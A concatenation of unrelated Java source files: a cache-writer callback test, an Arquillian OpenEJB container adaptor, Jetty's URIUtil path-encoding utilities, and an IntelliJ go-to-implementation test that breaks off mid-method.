assertTrue(writer.wasInvoked());
region.put(key, value, arg);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
try {
region.create(key, value, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
}
try {
region.put(key, value, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
}
}
/**
* Tests that the <code>CacheWriter</code> is called before an entry
* is {@linkplain CacheWriter#beforeUpdate updated}.
*/
public void testCacheWriterBeforeUpdate() throws CacheException {
String name = this.getUniqueName();
final Object key = this.getUniqueName();
final Object oldValue = new Integer(42);
final Object newValue = new Integer(43);
final Object arg = "ARG";
final String exception = "EXCEPTION";
TestCacheWriter writer = new TestCacheWriter() {
public void beforeCreate2(EntryEvent event)
throws CacheWriterException {
// This method will get invoked when the region is populated
}
public void beforeDestroy2(EntryEvent event)
throws CacheWriterException {
// This method will get invoked when the region is populated
}
public void beforeUpdate2(EntryEvent event)
throws CacheWriterException {
assertEquals(key, event.getKey());
assertEquals(newValue, event.getNewValue());
assertEquals(oldValue, event.getOldValue());
assertTrue(event.getOperation().isUpdate());
assertFalse(event.getOperation().isLoad());
assertFalse(event.getOperation().isLocalLoad());
assertFalse(event.getOperation().isNetLoad());
assertFalse(event.getOperation().isNetSearch());
Object argument = event.getCallbackArgument();
if (argument != null) {
if (argument.equals(exception)) {
String s = "Test CacheWriterException";
throw new CacheWriterException(s);
} else {
assertEquals(arg, argument);
}
}
}
};
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
Region region =
createRegion(name, factory.create());
region.create(key, oldValue);
assertTrue(writer.wasInvoked());
region.put(key, newValue);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.put(key, oldValue);
assertTrue(writer.wasInvoked());
region.put(key, newValue);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.create(key, oldValue);
assertTrue(writer.wasInvoked());
region.put(key, newValue, arg);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.put(key, oldValue);
assertTrue(writer.wasInvoked());
region.put(key, newValue, arg);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.create(key, oldValue);
assertTrue(writer.wasInvoked());
try {
region.put(key, newValue, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
}
region.destroy(key);
assertTrue(writer.wasInvoked());
region.create(key, oldValue);
assertTrue(writer.wasInvoked());
try {
region.put(key, newValue, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
}
}
/**
* Tests that the <code>CacheWriter</code> is called before an entry
* is {@linkplain CacheWriter#beforeDestroy destroyed}.
*/
public void testCacheWriterBeforeDestroy() throws CacheException {
String name = this.getUniqueName();
final Object key = this.getUniqueName();
final Object value = new Integer(42);
final Object arg = "ARG";
final String exception = "EXCEPTION";
TestCacheWriter writer = new TestCacheWriter() {
public void beforeCreate2(EntryEvent event)
throws CacheWriterException {
// This method will get invoked when the region is populated
}
public void beforeDestroy2(EntryEvent event)
throws CacheWriterException {
assertEquals(key, event.getKey());
assertEquals(value, event.getOldValue());
assertNull(event.getNewValue());
assertTrue(event.getOperation().isDestroy());
assertFalse(event.getOperation().isLoad());
assertFalse(event.getOperation().isLocalLoad());
assertFalse(event.getOperation().isNetLoad());
assertFalse(event.getOperation().isNetSearch());
Object argument = event.getCallbackArgument();
if (argument != null) {
if (argument.equals(exception)) {
String s = "Test CacheWriterException";
throw new CacheWriterException(s);
} else {
assertEquals(arg, argument);
}
}
}
};
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
Region region =
createRegion(name, factory.create());
region.create(key, value);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.create(key, value);
assertTrue(writer.wasInvoked());
region.destroy(key, arg);
assertTrue(writer.wasInvoked());
region.create(key, value);
assertTrue(writer.wasInvoked());
try {
region.destroy(key, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
}
}
/**
* Tests that the <code>CacheWriter</code> is called before a region
* is destroyed.
*
* @see CacheWriter#beforeRegionDestroy
* @see CacheWriter#close
*/
public void testCacheWriterBeforeRegionDestroy()
throws CacheException {
final String name = this.getUniqueName();
final Object arg = "ARG";
final String exception = "EXCEPTION";
TestCacheWriter writer = new TestCacheWriter() {
private boolean closed = false;
private boolean destroyed = false;
public boolean wasInvoked() {
boolean value = closed && destroyed;
super.wasInvoked();
return value;
}
public void close2() {
this.closed = true;
}
public void beforeRegionDestroy2(RegionEvent event)
throws CacheWriterException {
assertEquals(name, event.getRegion().getName());
// this should be a distributed destroy unless the region
// is local scope
assertTrue(event.getOperation().isRegionDestroy());
assertFalse(event.getOperation().isExpiration());
assertFalse(event.isOriginRemote());
Object argument = event.getCallbackArgument();
if (argument != null) {
if (argument.equals(exception)) {
String s = "Test CacheWriterException";
throw new CacheWriterException(s);
} else {
assertEquals(arg, argument);
}
}
this.destroyed = true;
}
};
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
RegionAttributes attrs = factory.create();
Region region;
region = createRegion(name, attrs);
region.destroyRegion();
assertTrue(region.isDestroyed());
assertTrue(writer.wasInvoked());
region = createRegion(name, attrs);
region.destroyRegion(arg);
assertTrue(writer.wasInvoked());
assertTrue(region.isDestroyed());
try {
region = createRegion(name, attrs);
region.destroyRegion(exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
assertFalse(region.isDestroyed());
assertNull(region.getSubregion(name));
}
}
/**
* Tests that a <code>CacheWriter</code> is <I>not</I> invoked on a
* {@linkplain Region#localDestroyRegion local destroy}.
*/
public void testCacheWriterLocalDestroy() throws CacheException {
final String name = this.getUniqueName();
// If any of the writer's callback methods are invoked
TestCacheWriter writer = new TestCacheWriter() { };
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
RegionAttributes attrs = factory.create();
Region region = createRegion(name, attrs);
region.localDestroyRegion();
}
/**
* Tests that a {@link CacheWriter} throwing a {@link
* CacheWriterException} aborts the operation.
*/
public void testCacheWriterExceptionAborts() throws CacheException {
final String name = this.getUniqueName();
final String exception = "EXCEPTION";
TestCacheWriter writer = new TestCacheWriter() {
private void handleEvent(Object argument)
throws CacheWriterException {
if (exception.equals(argument)) {
String s = "Test Exception";
throw new CacheWriterException(s);
}
}
public void beforeCreate2(EntryEvent event)
throws CacheWriterException {
handleEvent(event.getCallbackArgument());
}
public void beforeUpdate2(EntryEvent event)
throws CacheWriterException {
handleEvent(event.getCallbackArgument());
}
public void beforeDestroy2(EntryEvent event)
throws CacheWriterException {
handleEvent(event.getCallbackArgument());
}
public void beforeRegionDestroy2(RegionEvent event)
throws CacheWriterException {
handleEvent(event.getCallbackArgument());
}
};
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
RegionAttributes attrs = factory.create();
Region region;
region = createRegion(name, attrs);
Object value = new Integer(42);
String p1 = "Test Exception";
getCache().getLogger().info("<ExpectedException action=add>"
+ p1 + "</ExpectedException>");
try {
region.put(name, value, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
assertNull(region.getEntry(name));
} finally {
getCache().getLogger().info("<ExpectedException action=remove>"
+ p1 + "</ExpectedException>");
}
region.put(name, value);
try {
region.put(name, "NEVER SEEN", exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
Region.Entry entry = region.getEntry(name);
assertNotNull(entry);
assertEquals(value, entry.getValue());
}
try {
region.destroy(name, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
Region.Entry entry = region.getEntry(name);
assertNotNull(entry);
assertEquals(value, entry.getValue());
}
try {
region.destroyRegion(exception);
} catch (CacheWriterException ex) {
assertTrue(!region.isDestroyed());
assertNotNull(region.getParentRegion().getSubregion(name));
}
}
}
|
|
/*
* JBoss, Home of Professional Open Source
* Copyright 2010, Red Hat Middleware LLC, and individual contributors
* by the @authors tag. See the copyright.txt in the distribution for a
* full listing of individual contributors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jboss.arquillian.container.openejb.embedded_3_1;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;
import org.apache.openejb.NoSuchApplicationException;
import org.apache.openejb.OpenEJB;
import org.apache.openejb.OpenEJBException;
import org.apache.openejb.UndeployException;
import org.apache.openejb.assembler.classic.AppInfo;
import org.apache.openejb.assembler.classic.Assembler;
import org.apache.openejb.client.LocalInitialContextFactory;
import org.apache.openejb.loader.SystemInstance;
import org.jboss.arquillian.spi.client.container.DeployableContainer;
import org.jboss.arquillian.spi.client.container.DeploymentException;
import org.jboss.arquillian.spi.client.container.LifecycleException;
import org.jboss.arquillian.spi.client.protocol.ProtocolDescription;
import org.jboss.arquillian.spi.client.protocol.metadata.ProtocolMetaData;
import org.jboss.arquillian.spi.core.InstanceProducer;
import org.jboss.arquillian.spi.core.annotation.ContainerScoped;
import org.jboss.arquillian.spi.core.annotation.DeploymentScoped;
import org.jboss.arquillian.spi.core.annotation.Inject;
import org.jboss.shrinkwrap.api.Archive;
import org.jboss.shrinkwrap.descriptor.api.Descriptor;
import org.jboss.shrinkwrap.openejb.config.ShrinkWrapConfigurationFactory;
/**
* Arquillian {@link DeployableContainer} adaptor
* for a target OpenEJB environment; responible
* for lifecycle and deployment operations
*
* @author <a href="mailto:[email protected]">ALR</a>
* @version $Revision: $
*/
public class OpenEJBContainer implements DeployableContainer<OpenEJBConfiguration>
{
//-------------------------------------------------------------------------------------||
// Class Members ----------------------------------------------------------------------||
//-------------------------------------------------------------------------------------||
//-------------------------------------------------------------------------------------||
// Instance Members -------------------------------------------------------------------||
//-------------------------------------------------------------------------------------||
/**
* OpenEJB Assembler
*/
private Assembler assembler;
/**
* OpenEJB Configuration Factory for the Container
*/
private ShrinkWrapConfigurationFactory config;
/**
* OpenEJB Container configuration for Arquillian
*/
private OpenEJBConfiguration containerConfig;
/**
* The deployment
*/
@Inject @DeploymentScoped
private InstanceProducer<AppInfo> deployment;
/**
* The JNDI Context for this container.
*/
@Inject @ContainerScoped
private InstanceProducer<Context> jndiContext;
//-------------------------------------------------------------------------------------||
// Required Implementations -----------------------------------------------------------||
//-------------------------------------------------------------------------------------||
@Override
public ProtocolDescription getDefaultProtocol()
{
return new ProtocolDescription("Local");
}
@Override
public Class<OpenEJBConfiguration> getConfigurationClass()
{
return OpenEJBConfiguration.class;
}
@Override
public void setup(OpenEJBConfiguration configuration)
{
containerConfig = configuration;
}
/* (non-Javadoc)
* @see org.jboss.arquillian.spi.client.container.DeployableContainer#deploy(org.jboss.shrinkwrap.descriptor.api.Descriptor)
*/
@Override
public void deploy(Descriptor descriptor) throws DeploymentException
{
throw new UnsupportedOperationException("deploy Descriptor not supported");
}
/* (non-Javadoc)
* @see org.jboss.arquillian.spi.client.container.DeployableContainer#undeploy(org.jboss.shrinkwrap.descriptor.api.Descriptor)
*/
@Override
public void undeploy(Descriptor descriptor) throws DeploymentException
{
throw new UnsupportedOperationException("undeploy Descriptor not supported");
}
@Override
public ProtocolMetaData deploy(final Archive<?> archive) throws DeploymentException
{
// Deploy as an archive
final AppInfo appInfo;
try
{
appInfo = config.configureApplication(archive);
this.deployment.set(appInfo);
}
catch (final OpenEJBException e)
{
throw new DeploymentException("Could not configure application in OpenEJB", e);
}
try
{
assembler.createApplication(appInfo);
}
catch (final Exception ne)
{
throw new DeploymentException("Could not create the application", ne);
}
// Invoke locally
return new ProtocolMetaData();
}
@Override
public void start() throws LifecycleException
{
ShrinkWrapConfigurationFactory config = null;
OpenEJBAssembler assembler = null;
try
{
// Allow the OpenEJB startup code to run services required and configured
// by the user via external configuration resources.
OpenEJB.init(getInitialProperties());
assembler = (OpenEJBAssembler) SystemInstance.get().getComponent(Assembler.class);
config = (ShrinkWrapConfigurationFactory) assembler.getConfigurationFactory();
jndiContext.set(assembler.getContainerSystem().getJNDIContext());
}
catch (final Exception e)
{
throw new LifecycleException("Could not configure the OpenEJB Container", e);
}
// Set
this.assembler = assembler;
this.config = config;
}
@Override
public void stop() throws LifecycleException
{
assembler.destroy();
}
@Override
public void undeploy(final Archive<?> archive) throws DeploymentException
{
String deploymentName = archive.getName();
// Undeploy the archive
try
{
assembler.destroyApplication(deployment.get().jarPath);
{
}
}
catch (final UndeployException e)
{
throw new DeploymentException("Error in undeployment of " + deploymentName, e);
}
catch (final NoSuchApplicationException e)
{
throw new DeploymentException("Application was not deployed; cannot undeploy: " + deploymentName, e);
}
}
// Sets up properties for OpenEJB including those from a jndi.properties file
private Properties getInitialProperties() throws IOException
{
Properties properties = new Properties();
properties.put(InitialContext.INITIAL_CONTEXT_FACTORY, LocalInitialContextFactory.class.getName());
// Load properties from a jndi.properties file if it exists.
// OpenEJB would have done this if started via the InitialContext
if(containerConfig.getJndiProperties() != null)
{
File jndiPropertiesFile = new File(containerConfig.getJndiProperties());
if(jndiPropertiesFile.exists())
{
InputStream jndiPropertiesStream = new FileInputStream(jndiPropertiesFile);
if (jndiPropertiesStream != null)
{
properties.load(jndiPropertiesStream);
}
}
}
// configure OpenEJB to not deploy apps from the classpath
properties.put("openejb.deployments.classpath", "false");
// configure OpenEJB to use integration classes from Arquillian
properties.put("openejb.configurator", ShrinkWrapConfigurationFactory.class.getName());
properties.put("openejb.assembler", OpenEJBAssembler.class.getName());
if (containerConfig.getOpenEjbXml() != null)
{
properties.put("openejb.configuration", containerConfig.getOpenEjbXml());
}
return properties;
}
}
|
|
// ========================================================================
// Copyright (c) 2004-2009 Mort Bay Consulting Pty. Ltd.
// ------------------------------------------------------------------------
// All rights reserved. This program and the accompanying materials
// are made available under the terms of the Eclipse Public License v1.0
// and Apache License v2.0 which accompanies this distribution.
// The Eclipse Public License is available at
// http://www.eclipse.org/legal/epl-v10.html
// The Apache License v2.0 is available at
// http://www.opensource.org/licenses/apache2.0.php
// You may elect to redistribute this code under either of these licenses.
// ========================================================================
package org.eclipse.jetty.util;
import java.io.UnsupportedEncodingException;
import java.net.URI;
import java.net.URLEncoder;
import org.eclipse.jetty.util.log.Log;
/* ------------------------------------------------------------ */
/** URI Holder.
* This class assists with the decoding and encoding or HTTP URI's.
* It differs from the java.net.URL class as it does not provide
* communications ability, but it does assist with query string
* formatting.
* <P>UTF-8 encoding is used by default for % encoded characters. This
* may be overridden with the org.eclipse.jetty.util.URI.charset system property.
* @see UrlEncoded
*
*/
public class URIUtil
implements Cloneable
{
public static final String SLASH="/";
public static final String HTTP="http";
public static final String HTTP_COLON="http:";
public static final String HTTPS="https";
public static final String HTTPS_COLON="https:";
// Use UTF-8 as per http://www.w3.org/TR/html40/appendix/notes.html#non-ascii-chars
public static final String __CHARSET=System.getProperty("org.eclipse.jetty.util.URI.charset",StringUtil.__UTF8);
private URIUtil()
{}
/* ------------------------------------------------------------ */
/** Encode a URI path.
* This is the same encoding offered by URLEncoder, except that
* the '/' character is not encoded.
* @param path The path the encode
* @return The encoded path
*/
public static String encodePath(String path)
{
if (path==null || path.length()==0)
return path;
StringBuilder buf = encodePath(null,path);
return buf==null?path:buf.toString();
}
/* ------------------------------------------------------------ */
/** Encode a URI path.
* @param path The path the encode
* @param buf StringBuilder to encode path into (or null)
* @return The StringBuilder or null if no substitutions required.
*/
public static StringBuilder encodePath(StringBuilder buf, String path)
{
byte[] bytes=null;
if (buf==null)
{
loop:
for (int i=0;i<path.length();i++)
{
char c=path.charAt(i);
switch(c)
{
case '%':
case '?':
case ';':
case '#':
case '\'':
case '"':
case '<':
case '>':
case ' ':
buf=new StringBuilder(path.length()*2);
break loop;
default:
if (c>127)
{
try
{
bytes=path.getBytes(URIUtil.__CHARSET);
}
catch (UnsupportedEncodingException e)
{
throw new IllegalStateException(e);
}
buf=new StringBuilder(path.length()*2);
break loop;
}
}
}
if (buf==null)
return null;
}
synchronized(buf)
{
if (bytes!=null)
{
for (int i=0;i<bytes.length;i++)
{
byte c=bytes[i];
switch(c)
{
case '%':
buf.append("%25");
continue;
case '?':
buf.append("%3F");
continue;
case ';':
buf.append("%3B");
continue;
case '#':
buf.append("%23");
continue;
case '"':
buf.append("%22");
continue;
case '\'':
buf.append("%27");
continue;
case '<':
buf.append("%3C");
continue;
case '>':
buf.append("%3E");
continue;
case ' ':
buf.append("%20");
continue;
default:
if (c<0)
{
buf.append('%');
TypeUtil.toHex(c,buf);
}
else
buf.append((char)c);
continue;
}
}
}
else
{
for (int i=0;i<path.length();i++)
{
char c=path.charAt(i);
switch(c)
{
case '%':
buf.append("%25");
continue;
case '?':
buf.append("%3F");
continue;
case ';':
buf.append("%3B");
continue;
case '#':
buf.append("%23");
continue;
case '"':
buf.append("%22");
continue;
case '\'':
buf.append("%27");
continue;
case '<':
buf.append("%3C");
continue;
case '>':
buf.append("%3E");
continue;
case ' ':
buf.append("%20");
continue;
default:
buf.append(c);
continue;
}
}
}
}
return buf;
}
/* ------------------------------------------------------------ */
/** Encode a URI path.
* @param path The path the encode
* @param buf StringBuilder to encode path into (or null)
* @param encode String of characters to encode. % is always encoded.
* @return The StringBuilder or null if no substitutions required.
*/
public static StringBuilder encodeString(StringBuilder buf,
String path,
String encode)
{
if (buf==null)
{
loop:
for (int i=0;i<path.length();i++)
{
char c=path.charAt(i);
if (c=='%' || encode.indexOf(c)>=0)
{
buf=new StringBuilder(path.length()<<1);
break loop;
}
}
if (buf==null)
return null;
}
synchronized(buf)
{
for (int i=0;i<path.length();i++)
{
char c=path.charAt(i);
if (c=='%' || encode.indexOf(c)>=0)
{
buf.append('%');
StringUtil.append(buf,(byte)(0xff&c),16);
}
else
buf.append(c);
}
}
return buf;
}
/* ------------------------------------------------------------ */
/* Decode a URI path and strip parameters
* @param path The path the encode
* @param buf StringBuilder to encode path into
*/
public static String decodePath(String path)
{
if (path==null)
return null;
// Array to hold all converted characters
char[] chars=null;
int n=0;
// Array to hold a sequence of %encodings
byte[] bytes=null;
int b=0;
int len=path.length();
for (int i=0;i<len;i++)
{
char c = path.charAt(i);
if (c=='%' && (i+2)<len)
{
if (chars==null)
{
chars=new char[len];
bytes=new byte[len];
path.getChars(0,i,chars,0);
}
bytes[b++]=(byte)(0xff&TypeUtil.parseInt(path,i+1,2,16));
i+=2;
continue;
}
else if (c==';')
{
if (chars==null)
{
chars=new char[len];
path.getChars(0,i,chars,0);
n=i;
}
break;
}
else if (bytes==null)
{
n++;
continue;
}
// Do we have some bytes to convert?
if (b>0)
{
// convert series of bytes and add to chars
String s;
try
{
s=new String(bytes,0,b,__CHARSET);
}
catch (UnsupportedEncodingException e)
{
s=new String(bytes,0,b);
}
s.getChars(0,s.length(),chars,n);
n+=s.length();
b=0;
}
chars[n++]=c;
}
if (chars==null)
return path;
// if we have a remaining sequence of bytes
if (b>0)
{
// convert series of bytes and add to chars
String s;
try
{
s=new String(bytes,0,b,__CHARSET);
}
catch (UnsupportedEncodingException e)
{
s=new String(bytes,0,b);
}
s.getChars(0,s.length(),chars,n);
n+=s.length();
}
return new String(chars,0,n);
}
/* ------------------------------------------------------------ */
/* Decode a URI path and strip parameters.
* @param path The path the encode
* @param buf StringBuilder to encode path into
*/
public static String decodePath(byte[] buf, int offset, int length)
{
byte[] bytes=null;
int n=0;
for (int i=0;i<length;i++)
{
byte b = buf[i + offset];
if (b=='%' && (i+2)<length)
{
b=(byte)(0xff&TypeUtil.parseInt(buf,i+offset+1,2,16));
i+=2;
}
else if (b==';')
{
length=i;
break;
}
else if (bytes==null)
{
n++;
continue;
}
if (bytes==null)
{
bytes=new byte[length];
for (int j=0;j<n;j++)
bytes[j]=buf[j + offset];
}
bytes[n++]=b;
}
if (bytes==null)
return StringUtil.toString(buf,offset,length,__CHARSET);
return StringUtil.toString(bytes,0,n,__CHARSET);
}
/* ------------------------------------------------------------ */
/** Add two URI path segments.
* Handles null and empty paths, path and query params (eg ?a=b or
* ;JSESSIONID=xxx) and avoids duplicate '/'
* @param p1 URI path segment (should be encoded)
* @param p2 URI path segment (should be encoded)
* @return Legally combined path segments.
*/
public static String addPaths(String p1, String p2)
{
if (p1==null || p1.length()==0)
{
if (p1!=null && p2==null)
return p1;
return p2;
}
if (p2==null || p2.length()==0)
return p1;
int split=p1.indexOf(';');
if (split<0)
split=p1.indexOf('?');
if (split==0)
return p2+p1;
if (split<0)
split=p1.length();
StringBuilder buf = new StringBuilder(p1.length()+p2.length()+2);
buf.append(p1);
if (buf.charAt(split-1)=='/')
{
if (p2.startsWith(URIUtil.SLASH))
{
buf.deleteCharAt(split-1);
buf.insert(split-1,p2);
}
else
buf.insert(split,p2);
}
else
{
if (p2.startsWith(URIUtil.SLASH))
buf.insert(split,p2);
else
{
buf.insert(split,'/');
buf.insert(split+1,p2);
}
}
return buf.toString();
}
/* ------------------------------------------------------------ */
/** Return the parent Path.
* Treat a URI like a directory path and return the parent directory.
*/
public static String parentPath(String p)
{
if (p==null || URIUtil.SLASH.equals(p))
return null;
int slash=p.lastIndexOf('/',p.length()-2);
if (slash>=0)
return p.substring(0,slash+1);
return null;
}
/* ------------------------------------------------------------ */
/** Convert a path to a cananonical form.
* All instances of "." and ".." are factored out. Null is returned
* if the path tries to .. above its root.
* @param path
* @return path or null.
*/
public static String canonicalPath(String path)
{
if (path==null || path.length()==0)
return path;
int end=path.length();
int start = path.lastIndexOf('/', end);
search:
while (end>0)
{
switch(end-start)
{
case 2: // possible single dot
if (path.charAt(start+1)!='.')
break;
break search;
case 3: // possible double dot
if (path.charAt(start+1)!='.' || path.charAt(start+2)!='.')
break;
break search;
}
end=start;
start=path.lastIndexOf('/',end-1);
}
// If we have checked the entire string
if (start>=end)
return path;
StringBuilder buf = new StringBuilder(path);
int delStart=-1;
int delEnd=-1;
int skip=0;
while (end>0)
{
switch(end-start)
{
case 2: // possible single dot
if (buf.charAt(start+1)!='.')
{
if (skip>0 && --skip==0)
{
delStart=start>=0?start:0;
if(delStart>0 && delEnd==buf.length() && buf.charAt(delEnd-1)=='.')
delStart++;
}
break;
}
if(start<0 && buf.length()>2 && buf.charAt(1)=='/' && buf.charAt(2)=='/')
break;
if(delEnd<0)
delEnd=end;
delStart=start;
if (delStart<0 || delStart==0&&buf.charAt(delStart)=='/')
{
delStart++;
if (delEnd<buf.length() && buf.charAt(delEnd)=='/')
delEnd++;
break;
}
if (end==buf.length())
delStart++;
end=start--;
while (start>=0 && buf.charAt(start)!='/')
start--;
continue;
case 3: // possible double dot
if (buf.charAt(start+1)!='.' || buf.charAt(start+2)!='.')
{
if (skip>0 && --skip==0)
{ delStart=start>=0?start:0;
if(delStart>0 && delEnd==buf.length() && buf.charAt(delEnd-1)=='.')
delStart++;
}
break;
}
delStart=start;
if (delEnd<0)
delEnd=end;
skip++;
end=start--;
while (start>=0 && buf.charAt(start)!='/')
start--;
continue;
default:
if (skip>0 && --skip==0)
{
delStart=start>=0?start:0;
if(delEnd==buf.length() && buf.charAt(delEnd-1)=='.')
delStart++;
}
}
// Do the delete
if (skip<=0 && delStart>=0 && delEnd>=delStart)
{
buf.delete(delStart,delEnd);
delStart=delEnd=-1;
if (skip>0)
delEnd=end;
}
end=start--;
while (start>=0 && buf.charAt(start)!='/')
start--;
}
// Too many ..
if (skip>0)
return null;
// Do the delete
if (delEnd>=0)
buf.delete(delStart,delEnd);
return buf.toString();
}
/* ------------------------------------------------------------ */
/** Convert a path to a compact form.
* All instances of "//" and "///" etc. are factored out to single "/"
* @param path
* @return path
*/
public static String compactPath(String path)
{
if (path==null || path.length()==0)
return path;
int state=0;
int end=path.length();
int i=0;
loop:
while (i<end)
{
char c=path.charAt(i);
switch(c)
{
case '?':
return path;
case '/':
state++;
if (state==2)
break loop;
break;
default:
state=0;
}
i++;
}
if (state<2)
return path;
StringBuffer buf = new StringBuffer(path.length());
buf.append(path,0,i);
loop2:
while (i<end)
{
char c=path.charAt(i);
switch(c)
{
case '?':
buf.append(path,i,end);
break loop2;
case '/':
if (state++==0)
buf.append(c);
break;
default:
state=0;
buf.append(c);
}
i++;
}
return buf.toString();
}
/* ------------------------------------------------------------ */
/**
* @param uri URI
* @return True if the uri has a scheme
*/
public static boolean hasScheme(String uri)
{
for (int i=0;i<uri.length();i++)
{
char c=uri.charAt(i);
if (c==':')
return true;
if (!(c>='a'&&c<='z' ||
c>='A'&&c<='Z' ||
(i>0 &&(c>='0'&&c<='9' ||
c=='.' ||
c=='+' ||
c=='-'))
))
break;
}
return false;
}
}
|
|
/*
* Copyright 2000-2016 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.navigation;
import com.intellij.codeInsight.navigation.GotoTargetHandler;
import com.intellij.openapi.roots.ModuleRootModificationUtil;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.psi.PsiClass;
import com.intellij.psi.PsiElement;
import com.intellij.psi.PsiFile;
import com.intellij.psi.PsiMethod;
import com.intellij.testFramework.IdeaTestUtil;
import com.intellij.testFramework.PlatformTestUtil;
import com.intellij.testFramework.fixtures.CodeInsightTestUtil;
import com.intellij.testFramework.fixtures.JavaCodeInsightFixtureTestCase;
import java.util.Arrays;
public class GotoImplementationHandlerTest extends JavaCodeInsightFixtureTestCase {
public void testMultipleImplsFromAbstractCall() {
PsiFile file = myFixture.addFileToProject("Foo.java", "public abstract class Hello {\n" +
" abstract void foo();\n" +
"\n" +
" class A {\n" +
" {\n" +
" fo<caret>o();\n" +
" }\n" +
" }\n" +
" class Hello1 extends Hello {\n" +
" void foo() {}\n" +
" }\n" +
" class Hello2 extends Hello {\n" +
" void foo() {}\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(2, impls.length);
}
public void testFromIncompleteCode() {
PsiFile file = myFixture.addFileToProject("Foo.java", "public abstract class Hello {\n" +
" abstract void foo();\n" +
"\n" +
" class A {\n" +
" {\n" +
" Hello<caret>\n" +
" }\n" +
" }\n" +
" class Hello1 extends Hello {\n" +
" void foo() {}\n" +
" }\n" +
"}" +
"class Hello2 extends Hello {\n" +
" void foo() {}\n" +
"}\n");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(2, impls.length);
}
public void testToStringOnUnqualified() {
final PsiFile file = myFixture.addFileToProject("Foo.java", "public class Fix {\n" +
" {\n" +
" <caret>toString();\n" +
" }\n" +
"}\n" +
"class FixImpl1 extends Fix {\n" +
" @Override\n" +
" public String toString() {\n" +
" return \"Impl1\";\n" +
" }\n" +
"}\n" +
"class FixImpl2 extends Fix {\n" +
" @Override\n" +
" public String toString() {\n" +
" return \"Impl2\";\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
PlatformTestUtil.startPerformanceTest(getTestName(false), 150, () -> {
PsiElement[] impls = getTargets(file);
assertEquals(3, impls.length);
}).cpuBound().usesAllCPUCores().assertTiming();
}
public void testToStringOnQualified() {
final PsiFile file = myFixture.addFileToProject("Foo.java", "public class Fix {\n" +
" {\n" +
" Fix ff = new FixImpl1();\n" +
" ff.<caret>toString();\n" +
" }\n" +
"}\n" +
"class FixImpl1 extends Fix {\n" +
" @Override\n" +
" public String toString() {\n" +
" return \"Impl1\";\n" +
" }\n" +
"}\n" +
"class FixImpl2 extends Fix {\n" +
" @Override\n" +
" public String toString() {\n" +
" return \"Impl2\";\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
PlatformTestUtil.startPerformanceTest(getTestName(false), 150, () -> {
PsiElement[] impls = getTargets(file);
assertEquals(3, impls.length);
}).cpuBound().usesAllCPUCores().assertTiming();
}
public void testShowSelfNonAbstract() {
//fails if groovy plugin is enabled: org.jetbrains.plugins.groovy.codeInsight.JavaClsMethodElementEvaluator
PsiFile file = myFixture.addFileToProject("Foo.java", "public class Hello {\n" +
" void foo(){}\n" +
"\n" +
" class A {\n" +
" {\n" +
" fo<caret>o();\n" +
" }\n" +
" }\n" +
" class Hello1 extends Hello {\n" +
" void foo() {}\n" +
" }\n" +
" class Hello2 extends Hello {\n" +
" void foo() {}\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(3, impls.length);
}
public void testMultipleImplsFromStaticCall() {
PsiFile file = myFixture.addFileToProject("Foo.java", "public abstract class Hello {\n" +
" static void bar (){}\n" +
" class Hello1 extends Hello {\n" +
" }\n" +
" class Hello2 extends Hello {\n" +
" }\n" +
"class D {\n" +
" {\n" +
" He<caret>llo.bar();\n" +
